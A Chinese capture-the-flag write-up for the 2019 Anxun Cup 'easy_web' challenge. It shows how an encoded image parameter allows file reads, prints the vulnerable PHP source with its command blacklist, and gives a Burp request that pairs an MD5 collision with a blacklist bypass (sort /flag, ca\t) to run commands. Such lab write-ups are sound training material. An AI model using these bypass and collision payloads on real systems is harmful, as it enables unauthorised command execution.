[安洵杯 2019]easy_web详解
靶场:https://www.nssctf.cn/problem/732。
·
[安洵杯 2019]easy_web
文章目录
靶场:https://www.nssctf.cn/problem/732
解题步骤
开环境,发现link为:http://node4.anna.nssctf.cn:28200/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=
1️⃣一眼cmd,命令执行。有waf,尝试无果。TXpVek5UTTFNbVUzTURabE5qYz0有猫腻,尝试解码(base64->base64->hex),得到555.png,访问http://node4.anna.nssctf.cn:28200/555.png,得到一张base64编码的图片,尝试base64图片解码,乱码。
2️⃣img是get参数,且经过编码,按照相同逻辑编码(hex->base64->base64)flag.php访问,页面输出:“xixi~ no flag”,无果。
3️⃣随编码index.php,得到MzUzNTM1MmU3MDZlNjc=,访问http://node4.anna.nssctf.cn:28200/index.php?img=MzUzNTM1MmU3MDZlNjc=&cmd=,F12将图片的base64复制下来解码,得到index.php,接下来代码审计
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixi~ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
?>
<html>
<style>
body{
background:url(./bj.png) no-repeat center center;
background-size:cover;
background-attachment:fixed;
background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
4️⃣关键代码审计,md5强比较
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
BP发包,使用sort /flag,或者ca\t /flag,具体操作看参考
POST /index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=sort%20/flag HTTP/1.1
Host: node4.anna.nssctf.cn:28200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 307
Origin: http://node4.anna.nssctf.cn:28200
Connection: close
Referer: http://node4.anna.nssctf.cn:28200/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=l\s
Upgrade-Insecure-Requests: 1
a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
脚本集
base64图片解码
# -*- coding:utf-8 -*-
# @Time: 2023-10-01 19:35
# @Author: zer01
# @File:main.py
# @Description: https://blog.csdn.net/mouday/article/details/93489508
import base64
import re
def decode_image(file):
with open(file) as f:
# 1、信息提取
result = re.search("data:image/(?P<ext>.+?);base64,(?P<data>.+)", f.read(), re.DOTALL)
if result:
ext = result.groupdict().get("ext")
# print(ext)
data = result.groupdict().get("data")
else:
raise Exception("Do not parse!")
# 2、base64解码
img = base64.urlsafe_b64decode(data).decode('utf-8')
# 3、输出解码结果
print(img)
if __name__ == '__main__':
filename = 'base64_img.txt'
decode_image(filename)
解码(base64->base64->hex)
# -*- coding:utf-8 -*-
# @Time: 2023-10-01 19:35
# @Author: zer01
# @File:main.py
# @Description:
import base64
def b64decode_padding(encoded_data):
# 补齐Base64字符串
padding = len(encoded_data) % 4
encoded_data += '=' * (4 - padding)
# 解码
decoded_data = base64.b64decode(encoded_data).decode('utf-8')
return decoded_data
def hexdecode(hex_string):
decoded_data = bytes.fromhex(hex_string).decode('utf-8')
return decoded_data
if __name__ == '__main__':
str = "TXpVek5UTTFNbVUzTURabE5qYz0"
str1 = b64decode_padding(str)
print(str1)
str2 = b64decode_padding(str1)
print(str2)
str3 = hexdecode(str2)
print(str3)
# MzUzNTM1MmU3MDZlNjc=
# 3535352e706e67
# 555.png
编码(hex->base64->base64)
# -*- coding:utf-8 -*-
# @Time: 2023-10-01 19:35
# @Author: zer01
# @File:main.py
# @Description:
import base64
str = "index.php"
str1 = bytes(str, 'utf-8').hex()
print(str1)
str2 = base64.b64encode(str1.encode('utf-8')).decode('utf-8')
print(str2)
str3 = base64.b64encode(str2.encode('utf-8')).decode('utf-8')
print(str3)
参考
[安洵杯 2019]easy_web:https://blog.csdn.net/qq_64201116/article/details/126093234
命令执行各种绕过总结:https://blog.csdn.net/m0_64815693/article/details/127268809
魔乐社区(Modelers.cn) 是一个中立、公益的人工智能社区,提供人工智能工具、模型、数据的托管、展示与应用协同服务,为人工智能开发及爱好者搭建开放的学习交流平台。社区通过理事会方式运作,由全产业链共同建设、共同运营、共同享有,推动国产AI生态繁荣发展。
更多推荐
1
0- 0
已为社区贡献2条内容
所有评论(0)